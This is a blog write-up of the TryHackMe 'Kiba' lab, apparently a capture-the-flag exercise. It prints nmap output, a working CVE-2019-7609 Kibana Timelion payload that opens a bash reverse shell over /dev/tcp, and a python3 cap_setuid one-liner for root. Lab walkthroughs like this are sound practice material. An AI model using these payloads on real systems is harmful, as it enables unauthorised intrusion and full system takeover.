C R E A T E & D E S T R OY

Kiba | TryHackMe

Identify the critical security flaw in the data visualization dashboard, that allows execute remote code execution. Easy difficulty.

As usual, an nmap scan starts enumeration.

nmap -sC -sV -T4 -oN initial.scan 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-12 19:54 BST
Nmap scan report for
Host is up (0.073s latency).
Not shown: 998 closed tcp ports (conn-refused)
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 9d:f8:d1:57:13:24:81:b6:18:5d:04:8e:d2:38:4f:90 (RSA)
|   256 e1:e6:7a:a1:a1:1c:be:03:d2:4e:27:1b:0d:0a:ec:b1 (ECDSA)
|_  256 2a:ba:e5:c5:fb:51:38:17:45:e7:b1:54:ca:a1:a3:fc (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.45 seconds

Initial suggestions are that we’ll have to get access to the server via the webapp.


Enumerating the directories and poking around doesn’t return much, so back to nmap to do an all ports scan.

5044/tcp open  lxi-evntsvc
5601/tcp open  esmagent

It turns out there was a web app running on port 5601…

After some time exploring the web app you’re able to answer questions 1, 2 and 3. We’re running in Kibana 6.5.4 and there’s a public exploit (CVE-2019-7609) available on GitHub. Apparently Timelion is vulnerable to RCE, just injecting a reverse shell script and running will suffice…

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/ 0>&1\'");//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
If only it were always this easy…

We get user.txt in the home directory. Now to escalate. I’m going to assume from the page running on port 80 that Linux Capabilities is going to be the vector here.

getcap -r / 2>/dev/null
/home/kiba/.hackmeplease/python3 = cap_setuid+ep

Looks like there’s capabilities for the python3 binary inside our home directory so off to GTFO bins for some help…

/home/kiba/.hackmeplease/python3 -c 'import os; os.setu
id(0); os.system("/bin/bash")'

And with that it’s root access and on to the root flag.

Leave a Reply

Your email address will not be published. Required fields are marked *